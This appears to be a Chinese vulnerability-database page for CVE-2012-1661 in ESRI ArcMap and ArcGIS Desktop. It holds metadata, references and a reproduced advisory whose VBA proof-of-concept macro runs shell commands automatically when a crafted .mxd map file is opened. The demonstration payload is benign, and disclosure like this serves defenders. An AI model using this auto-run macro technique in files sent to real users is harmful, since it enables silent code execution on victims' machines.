ESRI ArcMap 任意代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121196 漏洞类型 代码注入
发布时间 2012-06-14 更新时间 2012-06-17
CVE编号 CVE-2012-1661 CNNVD-ID CNNVD-201206-255
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/19138
https://www.securityfocus.com/bid/53988
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201206-255
|漏洞详情
ESRIArcMap9版本和ArcGIS10.0.2.3200版本及早期版本中存在任意代码执行漏洞。攻击者可利用该漏洞在应用程序上下文中执行任意代码,攻击失败将导致拒绝服务。
|漏洞EXP
=====
TITLE
=====

ESRI ArcMap Arbitrary Code Execution Via Crafted Map File

============
Description:
============

Opening a specially crafted mxd file will execute arbitrary
code without prompting and without a crash of the application.
This is due to a flaw in the programs ability to prompt a user
before executing embedded VBA. Mxd files are not filtered by
email systems so this allows a remote attacker to trick a user
into opening a map file via email and unknowingly gain control
over their system.

===============================
Versions affected (maybe more):
===============================
ArcMap 9

ArcGIS Desktop 10
Release Version: 10.0
Product Version: 10.0.1.2800
ArcGIS Service Pack: 1 (build 10.0.1.2800)

ArcGIS Desktop 10
Release Version: 10.0
Product Version: 10.0.2.3200
ArcGIS Service Pack: 2 (build 10.0.2.3200)

=================
Proof of concept:
=================

If the following macro is implemented in the project
the Shell statements will be executed when the
document is opened without prompt.

Private Function MxDocument_OpenDocument() As Boolean
Shell "calc.exe", vbNormalFocus
Shell "cmd /c start
http://www.cs.umb.edu/~joecohen/exploits/CVE-2012-1661.htm",
vbNormalFocus
End Function

Video at site:

http://www.cs.umb.edu/~joecohen/exploits/CVE-2012-1661
|参考资料

来源:SECTRACK
名称:1027170
链接:http://www.securitytracker.com/id?1027170
来源:OSVDB
名称:82986
链接:http://www.osvdb.org/82986
来源:EXPLOIT-DB
名称:19138
链接:http://www.exploit-db.com/exploits/19138
来源:www.cs.umb.edu
链接:http://www.cs.umb.edu/~joecohen/exploits/CVE-2012-1661/
来源:packetstormsecurity.org
链接:http://packetstormsecurity.org/files/113644/ESRI-ArcMap-Arbitrary-Code-Execution.html
来源:BID
名称:53988
链接:http://www.securityfocus.com/bid/53988